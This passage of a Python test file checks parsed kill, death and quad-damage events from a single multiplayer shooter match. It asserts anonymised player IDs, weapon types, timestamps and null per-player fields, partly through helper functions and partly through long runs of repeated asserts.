assert e[15]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[15]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[15]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[15]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[15]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[15]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[15]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[15]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[15]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[15]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[15]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[15]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[15]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[15]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[15]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[15]['DATA']['VICTIM']['TEAM'] is None # noqa
# ---------------------------------------------------------------------------
# Events 15-28: anonymised PLAYER_KILL / PLAYER_DEATH pairs (plus one
# PLAYER_QUAD pickup at e[19]).  Every player record carries only a
# STEAM_ID; all other per-player fields are None, and all optional
# event-level fields (round/team bookkeeping) are None as well.
# The twelve fully-visible frag events differ only in TYPE, MOD, TIME and
# victim, so they are checked data-driven instead of via ~50 copy-pasted
# asserts each.  `== False` comparisons were replaced with `is False`
# (pycodestyle E712); WARMUP is a JSON-decoded boolean, so the stricter
# identity check is equivalent for real event data.
# ---------------------------------------------------------------------------

# Tail of event 15 (PLAYER_KILL — its earlier asserts precede this chunk).
assert e[15]['DATA']['VICTIM']['VIEW']['X'] is None
assert e[15]['DATA']['VICTIM']['VIEW']['Y'] is None
assert e[15]['DATA']['VICTIM']['VIEW']['Z'] is None
assert e[15]['DATA']['VICTIM']['WEAPON'] is None
assert e[15]['DATA']['WARMUP'] is False
assert e[15]['TYPE'] == 'PLAYER_KILL'

_MATCH_GUID = '19b5bc9bf2e789eab15613dd3ee3e97b'
_KILLER_ID = '6179638dba55b8f5d2da7838'
_VICTIM_A = '254e24151c9e5466251073e6'
_VICTIM_B = '7727c59e2bf61c4a67428d15'

# Scalar player fields that must be None on an anonymised player record.
_NULL_PLAYER_FIELDS = (
    'AIRBORNE', 'AMMO', 'ARMOR', 'BOT', 'BOT_SKILL', 'HEALTH',
    'HOLDABLE', 'NAME', 'POWERUPS', 'SPEED', 'SUBMERGED', 'TEAM', 'WEAPON',
)
# Event-level DATA fields that must be None on every kill/death event here.
_NULL_EVENT_FIELDS = (
    'OTHER_TEAM_ALIVE', 'OTHER_TEAM_DEAD', 'ROUND', 'SUICIDE',
    'TEAMKILL', 'TEAM_ALIVE', 'TEAM_DEAD',
)


def _check_player(player, steam_id):
    """Assert an anonymised player dict: STEAM_ID set, everything else None.

    Covers the scalar fields plus the X/Y/Z components of POSITION and VIEW.
    The failing field name is attached to the AssertionError for diagnosis.
    """
    for field in _NULL_PLAYER_FIELDS:
        assert player[field] is None, field
    for axis in ('X', 'Y', 'Z'):
        assert player['POSITION'][axis] is None, 'POSITION.' + axis
        assert player['VIEW'][axis] is None, 'VIEW.' + axis
    assert player['STEAM_ID'] == steam_id


def _check_frag(event, event_type, mod, time, victim_id):
    """Assert one PLAYER_KILL / PLAYER_DEATH event of the fixed shape above.

    Killer is always `_KILLER_ID`; `event_type`, `mod`, `time` and
    `victim_id` are the only values that vary between these events.
    """
    data = event['DATA']
    _check_player(data['KILLER'], _KILLER_ID)
    _check_player(data['VICTIM'], victim_id)
    for field in _NULL_EVENT_FIELDS:
        assert data[field] is None, field
    assert data['MATCH_GUID'] == _MATCH_GUID
    assert data['MOD'] == mod
    assert data['TIME'] == time
    assert data['WARMUP'] is False
    assert event['TYPE'] == event_type


_check_frag(e[16], 'PLAYER_DEATH', 'ROCKET', 55.6, _VICTIM_A)
_check_frag(e[17], 'PLAYER_KILL', 'PLASMA', 60.3, _VICTIM_A)
_check_frag(e[18], 'PLAYER_DEATH', 'PLASMA', 60.3, _VICTIM_A)

# Event 19: quad-damage pickup by the killer.
assert e[19]['DATA']['MATCH_GUID'] == _MATCH_GUID
assert e[19]['DATA']['STEAM_ID'] == _KILLER_ID
assert e[19]['DATA']['TIME'] == 69.7
assert e[19]['DATA']['WARMUP'] is False
assert e[19]['TYPE'] == 'PLAYER_QUAD'

_check_frag(e[20], 'PLAYER_KILL', 'LIGHTNING', 72.3, _VICTIM_A)
_check_frag(e[21], 'PLAYER_DEATH', 'LIGHTNING', 72.3, _VICTIM_A)
_check_frag(e[22], 'PLAYER_KILL', 'LIGHTNING', 74.1, _VICTIM_B)
_check_frag(e[23], 'PLAYER_DEATH', 'LIGHTNING', 74.1, _VICTIM_B)
_check_frag(e[24], 'PLAYER_KILL', 'LIGHTNING', 77.4, _VICTIM_B)
_check_frag(e[25], 'PLAYER_DEATH', 'LIGHTNING', 77.4, _VICTIM_B)
_check_frag(e[26], 'PLAYER_KILL', 'LIGHTNING', 88.6, _VICTIM_A)
_check_frag(e[27], 'PLAYER_DEATH', 'LIGHTNING', 88.6, _VICTIM_A)

# Head of event 28 (its WARMUP/TYPE asserts continue past this chunk):
# killer/victim records and the shared DATA fields visible in this span.
assert e[28]['DATA']['MATCH_GUID'] == _MATCH_GUID
assert e[28]['DATA']['MOD'] == 'LIGHTNING'
assert e[28]['DATA']['TIME'] == 89.5
for _field in _NULL_EVENT_FIELDS:
    assert e[28]['DATA'][_field] is None, _field
_check_player(e[28]['DATA']['KILLER'], _KILLER_ID)
_check_player(e[28]['DATA']['VICTIM'], _VICTIM_B)
assert e[28]['DATA']['WARMUP'] == False # noqa
assert e[28]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[29]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[29]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[29]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[29]['DATA']['KILLER']['BOT'] is None # noqa
assert e[29]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[29]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[29]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[29]['DATA']['KILLER']['NAME'] is None # noqa
assert e[29]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[29]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[29]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[29]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[29]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[29]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[29]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[29]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[29]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[29]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[29]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[29]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[29]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[29]['DATA']['MOD'] == 'LIGHTNING' # noqa
assert e[29]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[29]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[29]['DATA']['ROUND'] is None # noqa
assert e[29]['DATA']['SUICIDE'] is None # noqa
assert e[29]['DATA']['TEAMKILL'] is None # noqa
assert e[29]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[29]['DATA']['TEAM_DEAD'] is None # noqa
assert e[29]['DATA']['TIME'] == 89.5 # noqa
assert e[29]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[29]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[29]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[29]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[29]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[29]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[29]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[29]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[29]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[29]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[29]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[29]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[29]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[29]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[29]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[29]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[29]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[29]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[29]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[29]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[29]['DATA']['WARMUP'] == False # noqa
assert e[29]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[30]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[30]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[30]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[30]['DATA']['KILLER']['BOT'] is None # noqa
assert e[30]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[30]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[30]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[30]['DATA']['KILLER']['NAME'] is None # noqa
assert e[30]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[30]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[30]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[30]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[30]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[30]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[30]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[30]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[30]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[30]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[30]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[30]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[30]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[30]['DATA']['MOD'] == 'ROCKET_SPLASH' # noqa
assert e[30]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[30]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[30]['DATA']['ROUND'] is None # noqa
assert e[30]['DATA']['SUICIDE'] is None # noqa
assert e[30]['DATA']['TEAMKILL'] is None # noqa
assert e[30]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[30]['DATA']['TEAM_DEAD'] is None # noqa
assert e[30]['DATA']['TIME'] == 107.6 # noqa
assert e[30]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[30]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[30]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[30]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[30]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[30]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[30]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[30]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[30]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[30]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[30]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[30]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[30]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[30]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[30]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[30]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[30]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[30]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[30]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[30]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[30]['DATA']['WARMUP'] == False # noqa
assert e[30]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[31]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[31]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[31]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[31]['DATA']['KILLER']['BOT'] is None # noqa
assert e[31]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[31]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[31]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[31]['DATA']['KILLER']['NAME'] is None # noqa
assert e[31]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[31]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[31]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[31]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[31]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[31]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[31]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[31]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[31]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[31]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[31]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[31]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[31]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[31]['DATA']['MOD'] == 'ROCKET_SPLASH' # noqa
assert e[31]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[31]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[31]['DATA']['ROUND'] is None # noqa
assert e[31]['DATA']['SUICIDE'] is None # noqa
assert e[31]['DATA']['TEAMKILL'] is None # noqa
assert e[31]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[31]['DATA']['TEAM_DEAD'] is None # noqa
assert e[31]['DATA']['TIME'] == 107.6 # noqa
assert e[31]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[31]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[31]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[31]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[31]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[31]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[31]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[31]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[31]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[31]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[31]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[31]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[31]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[31]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[31]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[31]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[31]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[31]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[31]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[31]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[31]['DATA']['WARMUP'] == False # noqa
assert e[31]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[32]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[32]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[32]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[32]['DATA']['KILLER']['BOT'] is None # noqa
assert e[32]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[32]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[32]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[32]['DATA']['KILLER']['NAME'] is None # noqa
assert e[32]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[32]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[32]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[32]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[32]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[32]['DATA']['KILLER']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[32]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[32]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[32]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[32]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[32]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[32]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[32]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[32]['DATA']['MOD'] == 'SHOTGUN' # noqa
assert e[32]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[32]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[32]['DATA']['ROUND'] is None # noqa
assert e[32]['DATA']['SUICIDE'] is None # noqa
assert e[32]['DATA']['TEAMKILL'] is None # noqa
assert e[32]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[32]['DATA']['TEAM_DEAD'] is None # noqa
assert e[32]['DATA']['TIME'] == 112.9 # noqa
assert e[32]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[32]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[32]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[32]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[32]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[32]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[32]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[32]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[32]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[32]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[32]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[32]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[32]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[32]['DATA']['VICTIM']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[32]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[32]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[32]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[32]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[32]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[32]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[32]['DATA']['WARMUP'] == False # noqa
assert e[32]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[33]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[33]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[33]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[33]['DATA']['KILLER']['BOT'] is None # noqa
assert e[33]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[33]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[33]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[33]['DATA']['KILLER']['NAME'] is None # noqa
assert e[33]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[33]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[33]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[33]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[33]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[33]['DATA']['KILLER']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[33]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[33]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[33]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[33]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[33]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[33]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[33]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[33]['DATA']['MOD'] == 'SHOTGUN' # noqa
assert e[33]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[33]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[33]['DATA']['ROUND'] is None # noqa
assert e[33]['DATA']['SUICIDE'] is None # noqa
assert e[33]['DATA']['TEAMKILL'] is None # noqa
assert e[33]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[33]['DATA']['TEAM_DEAD'] is None # noqa
assert e[33]['DATA']['TIME'] == 112.9 # noqa
assert e[33]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[33]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[33]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[33]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[33]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[33]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[33]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[33]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[33]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[33]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[33]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[33]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[33]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[33]['DATA']['VICTIM']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[33]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[33]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[33]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[33]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[33]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[33]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[33]['DATA']['WARMUP'] == False # noqa
assert e[33]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[34]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[34]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[34]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[34]['DATA']['KILLER']['BOT'] is None # noqa
assert e[34]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[34]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[34]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[34]['DATA']['KILLER']['NAME'] is None # noqa
assert e[34]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[34]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[34]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[34]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[34]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[34]['DATA']['KILLER']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[34]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[34]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[34]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[34]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[34]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[34]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[34]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[34]['DATA']['MOD'] == 'ROCKET' # noqa
assert e[34]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[34]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[34]['DATA']['ROUND'] is None # noqa
assert e[34]['DATA']['SUICIDE'] is None # noqa
assert e[34]['DATA']['TEAMKILL'] is None # noqa
assert e[34]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[34]['DATA']['TEAM_DEAD'] is None # noqa
assert e[34]['DATA']['TIME'] == 114.9 # noqa
assert e[34]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[34]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[34]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[34]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[34]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[34]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[34]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[34]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[34]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[34]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[34]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[34]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[34]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[34]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[34]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[34]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[34]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[34]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[34]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[34]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[34]['DATA']['WARMUP'] == False # noqa
assert e[34]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[35]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[35]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[35]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[35]['DATA']['KILLER']['BOT'] is None # noqa
assert e[35]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[35]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[35]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[35]['DATA']['KILLER']['NAME'] is None # noqa
assert e[35]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[35]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[35]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[35]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[35]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[35]['DATA']['KILLER']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[35]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[35]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[35]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[35]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[35]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[35]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[35]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[35]['DATA']['MOD'] == 'ROCKET' # noqa
assert e[35]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[35]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[35]['DATA']['ROUND'] is None # noqa
assert e[35]['DATA']['SUICIDE'] is None # noqa
assert e[35]['DATA']['TEAMKILL'] is None # noqa
assert e[35]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[35]['DATA']['TEAM_DEAD'] is None # noqa
assert e[35]['DATA']['TIME'] == 114.9 # noqa
assert e[35]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[35]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[35]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[35]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[35]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[35]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[35]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[35]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[35]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[35]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[35]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[35]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[35]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[35]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
